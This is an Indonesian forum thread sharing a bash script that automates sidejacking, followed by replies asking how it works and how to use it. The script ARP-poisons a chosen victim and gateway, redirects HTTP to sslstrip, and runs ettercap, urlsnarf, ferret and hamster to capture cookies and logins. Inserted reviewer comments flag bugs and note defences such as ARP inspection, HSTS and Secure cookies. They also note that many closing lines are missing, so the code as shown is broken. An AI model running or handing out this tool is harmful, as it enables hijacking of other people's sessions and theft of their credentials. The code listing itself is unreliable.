script untuk sidejacking..
Sidejacking neeh... yang gk ngerti post di mari .. thx


# v0.1
# tested in backtrack 4 R2 environment, run as root.
# xterm used for window control
# arpspoof poisons a single victim and gateway
# ferret and hamster for sidejacking
# sslstrip for https
# ettercap for everything else
# urlsnarf to monitor visited urls
# firefox needs to be configured with a proxy of <address missing in this copy of the listing>
# url for hamster server is http://hamster
# by gorara

# a few variables (do not change)
# --- internal state (leave as is) ---------------------------------------------
# m1..m4 are the "missing file" markers; cleanup() compares each against 0.
m1='0' m2='0' m3='0' m4='0'
quickclean='0'                  # quick clean-up flag, tested first in cleanup()
randmac='n'                     # MAC randomisation stays off unless -r is given
hamsterfile='hamster.txt'       # hamster's output file (name cannot be changed)
trap cleanup SIGINT SIGTERM     # control-c / termination runs cleanup()

# --- tunables (edit if required) ----------------------------------------------

# xterm window geometry and colours
x='0'; y='0'                    # x / y offset of the window
width='120'                     # window width
height='7'                      # window height
yoffset='120'                   # y offset
fgcolor='white'                 # foreground colour
bgcolor='black'                 # background colour

# message prefixes; the \e colour escapes are stored literally and only
# rendered where the script prints them with `echo -e`
warnstyle='[\e[01;38mw\e[00m]'  # warning messages
execstyle='[\e[01;32mx\e[00m]'  # "executing" messages
infostyle='[\e[01;34mi\e[00m]'  # informational messages
inputstyle='[\e[01;30m?\e[00m]' # input prompts

# output files
# NOTE(review): the script is meant to run as root and writes fixed, guessable
# names below the world-writable $temp (sslstrip.log, etter.cap, and later
# mac.orig / gw.orig). A pre-created symlink with one of those names would be
# followed by the root process; a private `mktemp -d` directory avoids that.
sslstripfile='sslstrip.log'     # sslstrip output file name
snifffile='sniff-*'             # wildcard for hamster's sniff files
etterfile='etter.cap'           # ettercap capture file
temp='/tmp'                     # temporary directory

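# usage: print the command-line help on stdout and terminate the script.
#
# Arguments: none (reads $0 for the script name shown in the help text).
# Outputs:   the help text, one line per printf argument.
# Returns:   does not return; exits with status 0.
#
# The function body had lost its braces in this listing, which made the
# definition a syntax error; they are restored here. The help text itself is
# unchanged, including the example lines whose address values are absent.
# NOTE(review): the exit status is 0 even when this is reached through the
# unknown-option arm of the argument parser, so a caller cannot distinguish
# "help requested" from "bad invocation".
function usage() {
    printf '%s\n' \
        "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]" \
        "" \
        "    -i interface    interface to use, ex. eth0, wlan0." \
        "    -t target    the target IP address." \
        "    -g gateway    the gateway IP address." \
        "    -r        randomize your MAC address," \
        "            only use for wired interfaces." \
        "    -h        display this help screen." \
        "" \
        "    examples: " \
        "     bash $0 -i eth0 -t -g -r" \
        "     bash $0 -i wlan0 -t -g" \
        ""
    exit 0
}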

# cleanup: handler for SIGINT/SIGTERM (registered with `trap` near the top of
# the file). Reverts the changes the script made on the local host, lists the
# capture files it left behind and optionally deletes them, then exits 0.
#
# Globals read: quickclean, randmac, interface, origmac, gw, temp,
#               sslstripfile, etterfile, snifffile, hamsterfile, m1..m4
#
# NOTE(review): this copy of the listing is structurally incomplete. The
# closing `}` of the function and the `fi` / `else` / `do` / `done` / `esac`
# lines of the compound statements below are not present, so the block does
# not parse as shown. The comments describe only the lines that are visible.
# NOTE(review): almost every expansion below is unquoted ($interface, $gw,
# $temp/..., $snifffile); values with spaces or glob characters would be
# word-split or expanded before reaching a command that runs as root.
function cleanup() {
echo -e "\n$warnstyle control-c pressed! "

# exit script if nothing has been modified
if [[ "$quickclean" = "1" ]]; then
echo -e "$infostyle nothing changed, all done!"
exit 0

echo -e "$infostyle cleaning up..."
echo -e "$execstyle flushing iptables..."
# NOTE(review): -F flushes every rule in the filter and nat tables, not only
# the single PREROUTING redirect the main program adds; rules the host had
# before the run are lost and are not restored.
iptables -F
iptables -t nat -F

echo -e "$execstyle turning off IP forwarding..."
# NOTE(review): forwarding is forced to 0; no visible line saves the value it
# had before the script switched it on.
echo "0" > /proc/sys/net/ipv4/ip_forward

# change back MAC address to original one
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle resetting MAC address...";
echo -e "$infostyle original MAC is: $origmac"
ifconfig $interface down
ifconfig $interface hw ether $origmac
ifconfig $interface up
    # NOTE(review): as shown, the -z test is true when $gw is EMPTY and the
    # `route add` below it would then run without a gateway value. An `else`
    # line has probably been lost here - confirm against an intact copy.
    if [ -z $gw ]; then
    echo -e "$warnstyle WARNING, you have no default gateway!"
    route add default gw $gw
# scratch files written by the MAC-randomisation step of the main program
rm $temp/mac.orig
rm $temp/gw.orig

echo -e "$execstyle cleaning up files..."
echo -e "$infostyle temp directory: "

# On-disk artifacts of a run: $temp/$sslstripfile and $temp/$etterfile in the
# temp directory, $snifffile (a wildcard) and $hamsterfile in the working
# directory.
# testing to see if files exist, if so display them...
    if [ -f $temp/$sslstripfile ]; then
    ls $temp/$sslstripfile
    #echo -e "$warnstyle missing $sslstripfile"

    if [ -f $temp/$etterfile ]; then
    ls $temp/$etterfile
    #echo -e "$warnstyle missing $etterfile"

echo -e "$infostyle current directory: "

    # NOTE(review): $snifffile holds the pattern sniff-* and is unquoted, so it
    # expands here; with more than one matching file `[ -f a b ]` is an error.
    if [ -f $snifffile ]; then
    ls $snifffile
    #echo -e "$warnstyle missing $snifffile"

    if [ -f $hamsterfile ]; then
    ls $hamsterfile
    #echo -e "$warnstyle missing $hamsterfile"

# testing to see if there are any files at all
# NOTE(review): m1..m4 are initialised to "0" and no visible line changes them,
# so this condition is always true as shown. The assignments were presumably in
# the lost `else` branches next to the commented-out "missing" messages above -
# TODO confirm.
if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then

# NOTE(review): `!= "y" || != "n"` is true for every value of $delete, so the
# loop can only end through the `break` in the case arms below.
while [[ "$delete" != "y" || "$delete" != "n" ]]

echo -en "$infostyle delete file(s)? [y/n]: "
# NOTE(review): `read` without -r interprets backslashes in the answer.
read delete

    case "$delete" in
        y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    n) echo -e "$warnstyle nothing deleted!"; break;;
        *) echo -e "$warnstyle wrong selection!";

# delete files as requested
if [[ "$delete_marker" = "y" ]]; then
    if [ -f $temp/$sslstripfile ]; then
    rm $temp/$sslstripfile

    if [ -f $temp/$etterfile ]; then
    rm $temp/$etterfile

    if [ -f $snifffile ]; then
    rm $snifffile

    if [ -f $hamsterfile ]; then
    rm $hamsterfile


    # presumably the `else` branch of the "any files at all" test above
    echo -e "$warnstyle nothing to delete!"

echo -e "$infostyle all done!"
exit 0

# start main program
#
# Command-line parsing: fills $interface, $target, $gateway and $randmac from
# -i / -t / -g / -r, and calls usage for -h or an unknown option.
#
# NOTE(review): this part of the listing is incomplete - the body of the first
# `if`, the `do` / `done` of the loop, the `esac`, and every `fi` are missing,
# so it does not parse as shown.
# NOTE(review): the three values are taken from the command line without any
# validation and are later passed unquoted to ifconfig, route, iptables and
# the sniffing tools, all running as root.
if [ "$#" -eq 0 ]; then

while [ "$#" -gt 0 ]
    case "$1" in
        # each arm shifts once; the option's value in $2 is presumably
        # consumed by a second shift that is not visible here - TODO confirm
        -i)  interface=$2; shift 1;;
    -r)  randmac="y"; shift 1;;
    -t)  target=$2; shift 1;;
    -g)  gateway=$2; shift 1;;
    -h)  usage;;
    -*)  usage; break;;
    *)  break;;

# required parameters
# NOTE(review): as shown, a missing required parameter ends the script with
# status 0 and no message; a call to usage may have been lost from this spot.
if [[ -z $interface || -z $target || -z $gateway ]]; then
exit 0


# Run summary and optional MAC-address randomisation.
#
# NOTE(review): this part of the listing is incomplete - the `fi` / `else`
# lines are missing, the first `if` has no body, and the statements that the
# "set quick cleanup flag" and "before this, ctrl-c ..." comments refer to
# (presumably assignments to $quickclean) are not visible.
if [[ "$randmac" = "y" ]]; then

# set quick cleanup flag

echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
# NOTE(review): $mac is not assigned anywhere in the visible lines.
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"

if [[ "$randmac" = "y" ]]; then

echo -e "$execstyle change of $interface MAC address requested."

# wireless interface names: refuse and stop
if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
echo -e "$infostyle wireless device detected..."
echo -e "$warnstyle can't change MAC address without taking wifi interface down"
echo -e "$warnstyle do it manually before connecting to the AP."
exit 0

# wired interface names: ask for confirmation first
if [[ "$interface" = eth* ]]; then
echo -e "$infostyle wired device detected..."
echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
echo -en "$inputstyle do you want to continue? [y/n]: "
read continue
    # the "exiting..." lines presumably belong to a lost `else` branch
    if [[ "$continue" = "y" ]]; then
    echo -e "$infostyle proceeding..."
    echo -e "$infostyle exiting..."
    exit 0    

# current hardware address, parsed from the HWaddr line of ifconfig's output
origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`


# before this, ctrl-c will exit script without doing anything.

# use macchanger to randomize MAC address, etc.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle randomizing MAC address...";
# NOTE(review): the redirection is attached to a bare assignment, so the
# gateway address goes into $gw and $temp/gw.orig is only created empty.
gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
ifconfig $interface down
# NOTE(review): root writes to a fixed file name under $temp (/tmp by default);
# a pre-existing symlink with that name would be followed.
macchanger -r $interface > $temp/mac.orig
ifconfig $interface up
    # NOTE(review): as shown, the -z test is true when $gw is EMPTY and the
    # `route add` below it would then run without a gateway value; an `else`
    # line has probably been lost - confirm against an intact copy.
    if [ -z $gw ]; then
    echo -e "$warnstyle WARNING, you have no default gateway!"
    route add default gw $gw
# $origmac is overwritten here with the "Current" value from macchanger's
# saved output; $fakemac takes the "Faked" value
origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
echo -e "$infostyle original MAC is: $origmac"
echo -e "$infostyle faked    MAC is: $fakemac"

# Host reconfiguration and tool start-up: enables IPv4 forwarding, adds one
# nat PREROUTING redirect, then starts hamster, ferret, sslstrip, ettercap,
# urlsnarf and arpspoof, each in its own background xterm, and finally waits
# in a loop until control-c triggers the cleanup trap.
#
# NOTE(review): the `done` of the final loop is missing in this copy, so the
# block does not parse as shown.
# NOTE(review): every xterm is opened at the same $x+$y position; $yoffset is
# never used in the visible lines, so the statements that moved each window
# down were presumably lost - TODO confirm.
#
# Defensive notes (reviewer):
#  - The technique depends on a changed gateway MAC in the victim's ARP cache.
#    Switch-level Dynamic ARP Inspection or static ARP entries for the gateway
#    block it, and ARP monitoring reports the changed mapping.
#  - The HTTP->HTTPS link rewriting fails against sites that send HSTS,
#    preferably preloaded, because the browser will not make the plaintext
#    request.
#  - Session cookies carrying the Secure attribute are not sent over plaintext
#    HTTP, so full-site HTTPS with Secure cookies removes what the sniffers
#    collect.
echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward

echo -e "$execstyle configuring iptables..."
# redirects incoming TCP port 80 to local port 10000 - presumably the port
# sslstrip listens on, since no listen-port option is passed to it below
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1

echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2

echo -e "$execstyle starting ferret   ... <logging to: console>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2

echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
# NOTE(review): log file with a fixed name under $temp, written as root
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
sleep 2

echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
# NOTE(review): capture file with a fixed name under $temp, written as root
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
sleep 2

echo -e "$execstyle starting urlsnarf ... <logging to: console>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2

echo -e "$infostyle trap is ready, now to direct traffic..."

echo -e "$execstyle ARP poisoning the target..."
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1

echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
# endless loop: each line read from stdin only re-prints the reminder; the
# script is meant to end through the SIGINT trap (cleanup), which would make
# the final `exit 0` unreachable once the lost `done` is in place
for ((;;)) do
read loop
echo -en "$infostyle press ctrl-c to terminate!"

exit 0
nanti bro kalo ane bikin tools deh .. soalnya ini tools nemu di jalan :P
ok ok seep ane submit .. :)
pengertian sidejacking apaan tuh om ?

( lagi males tanya google :p )

side jacking itu pencurian data yang memanfaatkan fasilitas cookies?
betul gk yaaa :D :D

widiiih ini script memanfaatkan hamster sama ferret ya om? suram dah wkwkwk

ane mo tanya yg ini:

Quote:# firefox needs to be configured with a proxy of

itu firefox kita untuk nangkep cookies orang lain harus di konfig pake http proxy port 1234 ya?
pdhl di scriptnya kan ga ada proxy bro? ato ane kurang jeli lihatnya ya?


(08-29-2011, 03:07 AM)konspirasi Wrote: widiiih ini script memanfaatkan hamster sama ferret ya om? suram dah wkwkwk

ane mo tanya yg ini:

Quote:# firefox needs to be configured with a proxy of

itu firefox kita untuk nangkep cookies orang lain harus di konfig pake http proxy port 1234 ya?
pdhl di scriptnya kan ga ada proxy bro? ato ane kurang jeli lihatnya ya?


kayaknya itu untuk ngebuka hamster di browser !! cz hamster aktif di port 1234 itu !! kayaknya seh gitu om !!!

(08-29-2011, 03:16 AM)RR12 Wrote:
(08-29-2011, 03:07 AM)konspirasi Wrote: widiiih ini script memanfaatkan hamster sama ferret ya om? suram dah wkwkwk

ane mo tanya yg ini:

Quote:# firefox needs to be configured with a proxy of

itu firefox kita untuk nangkep cookies orang lain harus di konfig pake http proxy port 1234 ya?
pdhl di scriptnya kan ga ada proxy bro? ato ane kurang jeli lihatnya ya?


kayaknya itu untuk ngebuka hamster di browser !! cz hamster aktif di port 1234 itu !! kayaknya seh gitu om !!!

woogh iya bro, maaf baru nyoba hamster nih :)
ketika ane coba muncul gini:
Quote:root@bt:/pentest/sniffers/hamster# ./hamster
--- HAMPSTER 2.0 side-jacking tool ---
begining thread
Set browser to use proxy
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on


hmm sidejacking... kayaknya cakep nih...
coba dulu ya om, tapi nnti.. :)

cara makenya gmana om?

